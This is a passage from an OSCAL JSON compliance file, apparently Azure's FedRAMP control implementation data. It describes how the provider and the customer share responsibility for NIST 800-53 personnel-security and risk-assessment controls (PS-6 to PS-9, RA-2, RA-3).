statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"59ae3c8b-cac1-4d55-a385-00898421d682","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-026"}],"statement-id":"ps-6_smt.c","by-components":[{"uuid":"2c888e7f-2a2d-4a44-86fd-c855cd906973","export":{"provided":[{"uuid":"3e2481e5-e2e6-4881-ac96-cf57aa97e681","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-025"}],"description":"Prior to granting access to organizational information and services, all Microsoft full-time employees (FTEs) must sign the Employee Agreement as a condition of employment. Third parties, such as subcontractors and vendors, must complete the Resource Access Agreements which includes non-disclosure provisions and statements regarding information and asset protection responsibilities."},{"uuid":"5f531719-7135-4723-8900-692a238bdc44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-026"}],"description":"Employees resign the EA if they move to some geographic locations. Submission of annual training completion constitutes agreement that the user understands and agrees to the EA. Third parties, such as subcontractors and vendors, must complete the Resource Access Agreements which includes non-disclosure provisions and statements regarding information and asset protection responsibilities. Third parties are also required to take Supplier Code of Conduct training (SCOC). Because of the nature of JIT access, a user's level of access can change multiple times per day. As such, Azure does not require resigning of the EA or retraining any time there is a change to the user's level of access."}],"responsibilities":[{"uuid":"50a1b7b4-e959-4bdb-b265-049ce27b3c2b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-025"}],"description":"The customer is responsible for verifying that individuals requiring access to customer-deployed resources review and sign access agreements prior to being granted access.","provided-uuid":"3e2481e5-e2e6-4881-ac96-cf57aa97e681"},{"uuid":"1a722f7b-873a-4686-ab05-8db07f015d21","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-026"}],"description":"The customer is responsible for verifying that individuals requiring access to customer-deployed resources re-sign when the agreements have been updated and/or at a customer-defined frequency.","provided-uuid":"5f531719-7135-4723-8900-692a238bdc44"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dd01e9db-1577-4949-8c17-a75b37fd3be7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-7","statements":[{"uuid":"addf8a7c-14cf-42c4-9876-21057739a0ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.a","by-components":[{"uuid":"5dbfc902-c2c4-4557-aeb7-e4283a66b6ad","export":{"provided":[{"uuid":"8b59eff0-e8ac-447e-b54a-b426c490fe29","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-027"}],"description":"Personnel security requirements, including security roles and responsibilities for third-party providers, are established by requiring them to comply with the Microsoft Information Security Policy. This includes personnel located at Microsoft subsidiaries and locations not owned by Microsoft, such as off-site facilities. Any third-party personnel with access to Azure must pass the same personnel screening process for the requirements established for the risk categorization of their role._x000D_ _x000D_ In all contracts, Microsoft includes provisions to ensure that third-party providers meet or exceed the personnel security requirements mandated by Microsoft. This includes the ability to successfully pass the Microsoft background check, or equivalent, as well as obtain and maintain additional clearances if the specific project requires it. Third-party providers that have access to the are subject to the same personnel screening requirements as Microsoft personnel working on Azure services for U.S. Government customers, including Federal background investigations._x000D_ _x000D_ Vendors and subcontractors that require logical access to Federal customer data, or physical access to controlled facilities that house Federal customer data (other than on an occasional or intermittent basis) for the Azure service are required to successfully complete Federal adjudicated background investigations._x000D_ _x000D_ Should a vendor or subcontractor require physical access to controlled facilities that contain customer data, a cleared/authorized individual is provided as an escort and must accompany the vendor or subcontractor at all times while in the secured location._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3085493c-6030-43fd-b7f0-14deda2ec023","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-027"}],"description":"The customer is responsible for third-party personnel security.","provided-uuid":"8b59eff0-e8ac-447e-b54a-b426c490fe29"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0aca8366-308e-4e39-b772-8251cacc33df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-028"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.b","by-components":[{"uuid":"3de79a44-8da6-4a4a-bb5a-3417864176e0","export":{"provided":[{"uuid":"36dc0250-bac6-46d7-b091-414bec15b6e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-028"}],"description":"Azure requires vendors and contractors to have a signed contract to ensure compliance with Microsoft policies and procedures, including personnel security policies and procedures, on required engagements._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d866e0cc-150d-4286-833d-1955b21358a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-028"}],"description":"The customer is responsible for requiring third-party providers to comply with customer-defined personnel security policies and procedures.","provided-uuid":"36dc0250-bac6-46d7-b091-414bec15b6e4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"20b045d8-c208-4158-a699-ce473efec605","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-029"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.c","by-components":[{"uuid":"b136efc9-2ff1-406d-84ad-52657dae6f03","export":{"provided":[{"uuid":"a0e00a35-f99a-493e-8da4-556d504b39ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-029"}],"description":"Personnel security requirements are documented in all vendor contracts and the Addendum to Vendor Agreement (Background Requirements)._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a26ba118-7672-4f8d-bcec-f442bdfc7e47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-029"}],"description":"The customer is responsible for documenting third-party personnel security requirements defined in PS-07.a.","provided-uuid":"a0e00a35-f99a-493e-8da4-556d504b39ad"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9b2fed96-2a4d-4f64-bd41-cdc71f477b3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.d","by-components":[{"uuid":"c9b960ef-6215-413d-810c-32b0d4858c07","export":{"provided":[{"uuid":"f3e8fa63-810c-440a-b262-7bf421e82567","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-030"}],"description":"Microsoft documents third-party security requirements in the Microsoft Information Security Policy and associated standards (provided). Specific notification requirements for transfers and terminations of third-party personnel with access to Azure are identical to those for Microsoft personnel._x000D_ _x000D_"}],"responsibilities":[{"uuid":"40ddb8a8-380e-4230-a6f2-25a3d9a6983a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-030"}],"description":"The customer is responsible for requiring third-party providers to notify customer-defined personnel/roles of any transfers/terminations of third-party personnel who possess customer credentials and/or badges within a customer-defined period of time.","provided-uuid":"f3e8fa63-810c-440a-b262-7bf421e82567"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1020267f-33b9-4c35-b0f9-e2921a49c0cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.e","by-components":[{"uuid":"bd453f0f-4786-47cb-b38c-7bbb26f8b4cf","export":{"provided":[{"uuid":"91432ddf-d577-4af5-b392-8d8d245de13c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-031"}],"description":"Microsoft monitors compliance with screening requirements for third-party personnel by tracking the outcome of screening directly. Microsoft requires approved screening vendors to submit screening outcomes for third-party personnel directly to Microsoft where they are tracked in HRIS and monitored by the groups contracting with the vendor._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6657b03d-4b24-444f-b459-17a5fc282858","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-031"}],"description":"The customer is responsible for third-party personnel security, including monitoring of third-party provider compliance with customer-defined requirements.","provided-uuid":"91432ddf-d577-4af5-b392-8d8d245de13c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"74096765-4f53-4dc4-8ab9-b2536c2dcfe0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-8","statements":[{"uuid":"f0f52d9d-e9aa-4006-85e8-0d71fbdd7cfd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-8_smt.a","by-components":[{"uuid":"73a04159-e70c-4929-9be2-2a6d4e128404","export":{"provided":[{"uuid":"d925a6c0-8c0a-4465-8388-857995dc1215","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-032"}],"description":"Microsoft's formal sanctions process for personnel failing to comply with established information security policies and procedures is defined in the Microsoft Information Security Policy. Specifically, depending on the particular type of misconduct, Microsoft's Online Services Staff suspected of committing breaches of security and/or violating Microsoft Security Program Policy (MSPP) are subject to an investigation process and appropriate disciplinary action up to and including termination._x000D_ _x000D_ When the Microsoft Human Resources (HR) team is notified of a possible security violation, the Office of Legal Compliance (OLC) is consulted. The OLC team advises HR if it is in scope for their team. If the incident is in scope for OLC, OLC investigates the possible security violation and reconnects with HR and the employee's manager on the findings. If the allegation is substantiated, OLC recommends the disciplinary action to be taken and directs HR and the employee's manager to debrief the employee and implement the discipline. Violations of Microsoft Information Security policies, standards, or procedures may result in corrective action, up to and including immediate termination of employment. In some cases, a breach of Microsoft Information Security policies, standards, or procedures may also violate an international, federal, state, or local law. In such cases, the individual may also be subject to civil and/or criminal liability._x000D_ _x000D_ _x000D_ _x000D_ Once the OLC findings are delivered to HR and management, the employee, absent extenuating circumstances, is typically debriefed within two (2) weeks. This would be the same if HR were leading the investigation, not in scope for OLC._x000D_ _x000D_ Violations that align with NIST 800-61 Rev. 2, Computer Security Incident Handling Guide, incident categories are reported to US-CERT and the impacted customer agency per the incident reporting requirements._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a9fb05c4-037d-4449-b89e-8cac08cff7b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-032"}],"description":"The customer is responsible for establishing a sanctions process for customer employees failing to comply with information security policies and procedures.","provided-uuid":"d925a6c0-8c0a-4465-8388-857995dc1215"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bf2731ba-2bd9-432e-8f90-1f2fce9384c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-033"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-8_smt.b","by-components":[{"uuid":"c2b9d27b-a793-49f5-a37f-7de45bf31429","export":{"provided":[{"uuid":"cd42728e-3606-49a1-937e-274b8f74a3b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-033"}],"description":"Microsoft's formal sanctions process for personnel failing to comply with established information security policies and procedures is defined in the Microsoft Information Security Policy. Specifically, depending on the particular type of misconduct, Microsoft's Online Services Staff suspected of committing breaches of security and/or violating Microsoft Security Program Policy (MSPP) are subject to an investigation process and appropriate disciplinary action up to and including termination._x000D_ _x000D_ When the Microsoft Human Resources (HR) team is notified of a possible security violation, the Office of Legal Compliance (OLC) is consulted. The OLC team advises HR if it is in scope for their team. If the incident is in scope for OLC, OLC investigates the possible security violation and reconnects with HR and the employee's manager on the findings. If the allegation is substantiated, OLC recommends the disciplinary action to be taken and directs HR and the employee's manager to debrief the employee and implement the discipline. Violations of Microsoft Information Security policies, standards, or procedures may result in corrective action, up to and including immediate termination of employment. In some cases, a breach of Microsoft Information Security policies, standards, or procedures may also violate an international, federal, state, or local law. In such cases, the individual may also be subject to civil and/or criminal liability._x000D_ _x000D_ Once the OLC findings are delivered to HR and management, the employee, absent extenuating circumstances, is typically debriefed within two (2) weeks. This would be the same if HR were leading the investigation, not in scope for OLC._x000D_ _x000D_ Security incidents are reported to US-CERT per the incident reporting requirements._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c1b9ee58-6f69-4db6-96c0-01ee69361f6b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-033"}],"description":"The customer is responsible for providing notifications, comprised of the identification of the sanctioned individual and the reason for the sanction, to customer-defined personnel/roles within a customer-defined time period when a formal employee sanctions process is initiated.","provided-uuid":"cd42728e-3606-49a1-937e-274b8f74a3b8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ad7cefd4-2d0b-4d32-83c5-ea601fce5403","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-9","statements":[{"uuid":"2da6caa5-98e8-42c9-8334-a545c77780a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-9_smt","by-components":[{"uuid":"3dd5ec91-61a4-493a-9051-6d1dd3b3e016","export":{"provided":[{"uuid":"a16e77a0-93f1-429c-bb11-d0ff2ffc72ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-034"}],"description":"Microsoft ensures that all Azure personnel including subcontractors have risk designations in place based on role assignments. The risk designation is based on the asset classification assigned to information accessed, including federal customer data. Asset classification is determined through the types of information the asset contains. Azure, in coordination with Microsoft Human Resources (HR), establishes screening criteria for Azure service team personnel by reviewing positions for risk as well as considering customer expectations. All personnel require the Microsoft Cloud Screen. Microsoft reviews the position risk designations as part of the annual Personnel Screening SOP update. All positions are subject to screening requirements. Personnel role assignments have concepts of privacy and security principles backed on them through the following training. Microsoft C+AI training and awareness components are classified into one of two types for personnel: Role-Based and Required. Role-Based Training Role-Based training is mandatory security and awareness education that is deemed helpful in the facilitation of understanding security processes and procedures for a particular role an individual is placed in and is directly related to the job responsibilities of the individual. Role-Based training is offered to full-time personnel through the STRIKE program for engineering disciplines providing 200-400 level security training and best practices. Required Training Required training is mandatory security and awareness education that the Information Risk Management Council (IRMC) has specifically identified and defined as appropriate for Azure personnel based upon their organization. Required annual training includes Security Foundations for new hires and non-engineering FTEs and the STRIKE program for engineering FTEs."}],"responsibilities":[{"uuid":"bc864f15-9250-4ebd-b3d4-47f820a62a22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-034"}],"description":"The customer is responsible for incorporating security and privacy roles and responsibilities into organizational position descriptions for customer-deployed resources.","provided-uuid":"a16e77a0-93f1-429c-bb11-d0ff2ffc72ed"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d102226b-c0ec-425c-b0bd-ea8038e5e629","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-2","statements":[{"uuid":"055cdf78-1e0f-4cc2-b4ae-cf539141683d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-2_smt.a","by-components":[{"uuid":"0f946020-d0d0-403c-b4b9-bc4d65d9abf8","export":{"provided":[{"uuid":"835837b8-c490-4a82-8a51-a0c2cb1e6609","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-006"}],"description":"Microsoft has completed a system categorization of the Azure information and information system in accordance with Federal Information Processing Standards (FIPS) 199, Standards for Security Categorization of Federal Information and Information Systems, and NIST Special Publication 800-60 Volume 1 Revision 1, Guide for Mapping Types of Information and Information Systems to Security Categories. Azure completed a Security Authorization package that undergoes the process for a Provisional Authorization to Operate at a High/High/High impact level with appropriate security control overlays. Security categorization is a function of the data and the system. Azure is categorized as a FedRAMP High and DoD IL2 system."}],"responsibilities":[{"uuid":"5cd9f146-88a7-4ef3-96fa-828947ee7faa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-006"}],"description":"The customer is responsible for categorizing resources and the information contained in accordance with applicable Federal Laws, Executive Orders, directives, policies, regulations, standards, and guidance. Customer agencies/departments must separately categorize their data in agreement with FIPS 199, Standards for Security Categorization of Federal Information and Information Systems, and NIST SP 800-60 Rev. 1, Guide for Mapping Types of Information and Information Systems to Security Categories.","provided-uuid":"835837b8-c490-4a82-8a51-a0c2cb1e6609"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"00b02b28-8f4e-485a-81f6-8686cc521577","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-2_smt.b","by-components":[{"uuid":"4c611a16-73f9-446c-afe2-00cdfedcfd9b","export":{"provided":[{"uuid":"1b08fcdf-0ae5-4ba2-8048-410280fcf46c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-007"}],"description":"The security categorization for Azure has been conducted and is documented in section 2 of this SSP. The overall security categorization has been assessed at the High impact level for CIA respectively as determined in accordance with Federal Information Processing Standards (FIPS) 199, Committee on National Security Systems Instruction (CNSSI) Number 1253, and Intelligence Community Directive (ICD) 503 guidelines. The security categorization process took into consideration supporting rationale for impact-level decisions and involved appropriate stakeholders and senior level organizational officials to review and approve the final security categorization activity."}],"responsibilities":[{"uuid":"32a7d31d-58eb-477a-a41a-95cd2eddcfe6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-007"}],"description":"The customer is responsible for documenting the security categorization results, including supporting rationale, defined in RA-02.a in the security plan.","provided-uuid":"1b08fcdf-0ae5-4ba2-8048-410280fcf46c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c599fe82-e817-434b-9225-bebf9425aea6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-2_smt.c","by-components":[{"uuid":"cd833f48-83e4-44fb-b6b0-fb0ff9dd879d","export":{"provided":[{"uuid":"5eb8b83a-8e26-4ad0-bc85-dab2b8c2c996","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-008"}],"description":"Microsoft has provided the security categorization assessment in the Azure security authorization package for the review and approval of the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required utilizing Azure."}],"responsibilities":[{"uuid":"31f78c87-1e01-439e-bd10-c9fc7aadcf71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-008"}],"description":"The customer is responsible for ensuring the security categorization decision is reviewed and approved by the authorizing official (AO) or designated representative responsible.","provided-uuid":"5eb8b83a-8e26-4ad0-bc85-dab2b8c2c996"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d9ef3cf2-c62e-45f3-86a6-3e0f69b931dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-3","statements":[{"uuid":"7db403ff-c7d9-42cc-a81d-975bc83050d0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.a","by-components":[{"uuid":"29c164ec-8a6c-4546-a95e-a54d0fdbb11c","export":{"provided":[{"uuid":"74635fd2-c363-4dff-9eda-2d9e9b59764e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-009"}],"description":"Microsoft conducts assessments of the risk including the likelihood and magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of Azure and the information it processes, stores, or transmits. The Security Assessment for Azure was completed in agreement with NIST Special Publication 800-30 Revision 1, Guide for Conducting Risk Assessments, and NIST Special Publication 800-53A Revision 4, Assessing Security and Privacy Controls in Federal Information Systems and Organizations: Building Effective Assessment Plans. Periodic risk assessments are performed for Azure to review the effectiveness of existing information security controls and safeguards, as well as to identify new risks. These assessments ensure all policies and supporting procedures properly address the environment in light of changing regulatory, contractual, business, technical, and operational requirements. Risk assessments take place annually, or more frequently as circumstances necessitate."}],"responsibilities":[{"uuid":"b316e95e-8cce-47cd-b9f6-e67bab519e10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-009"}],"description":"The customer is responsible for conducting a risk assessment that addresses the likelihood and magnitude of harm, from the unauthorized access, use, disclosure, disruption, modification, or destruction of customer-deployed resources and the information processed, stored, or transmitted. The customer is responsible for reviewing the Azure Security Authorization package and performing a risk assessment for any controls deferred to the customer relating to shared touch points as identified in the Azure Customer Responsibility Matrix.","provided-uuid":"74635fd2-c363-4dff-9eda-2d9e9b59764e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bbdd4c2e-2793-400b-92d4-70ef4320ad2c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.b","by-components":[{"uuid":"90a0c1a1-f20f-4814-9e8b-eb78bf457a8d","export":{"provided":[{"uuid":"3d7412a6-4023-4cd3-a3f4-09a06ac20a17","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-010"}],"description":"Periodic risk assessments are performed for Azure to review the effectiveness of existing information security controls and safeguards, as well as to identify new risks. These assessments ensure all policies and supporting procedures properly address the environment in light of changing regulatory, contractual, business, technical, and operational requirements. The risk assessment results are integrated with risk management decisions and remediation plans for Azure. Risk assessments take place annually, or more frequently as circumstances necessitate."}],"responsibilities":[{"uuid":"2f4f4179-dbd6-4711-b452-9c6eab307405","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-010"}],"description":"The customer is responsible for integrating risk assessment results and risk management decisions from the organization and mission or business process perspectives with system-level risk assessments for customer-deployed resources.","provided-uuid":"3d7412a6-4023-4cd3-a3f4-09a06ac20a17"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"61e50a9d-3fb1-4d52-86ff-0b88b8a0f74f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.c","by-components":[{"uuid":"3ad97bc3-92f8-4f72-b9cf-19fe422f2411","export":{"provided":[{"uuid":"5601c5cc-f8b8-46aa-839d-78a8d6b55ccf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-011"}],"description":"The Azure security risk assessment takes place during the annual assessment. The assessment is conducted in accordance with the approved Security Assessment Plan (SAP). The security assessment results are documented under Security Assessment Report (SAR) report. The security assessment is completed by an approved Third Party Assessment Organization (3PAO)."}],"responsibilities":[{"uuid":"666d32e2-4bf7-4824-b420-786025c1a4ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-011"}],"description":"The customer is responsible for conducting a risk assessment and documenting the risk assessment results in the security plan, risk assessment report, and/or other customer-defined document.","provided-uuid":"5601c5cc-f8b8-46aa-839d-78a8d6b55ccf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2d4c7f69-b005-497a-989e-897fce697c86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.d","by-components":[{"uuid":"08b7f0e5-2c8d-4929-9f5f-e8111a2be6d6","export":{"provided":[{"uuid":"e80dd5b3-76bd-4990-8439-34d6759e1145","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-012"}],"description":"The risk assessment is completed as part of the original security authorization package and reviewed by Microsoft annually, or when a significant change occurs as defined in 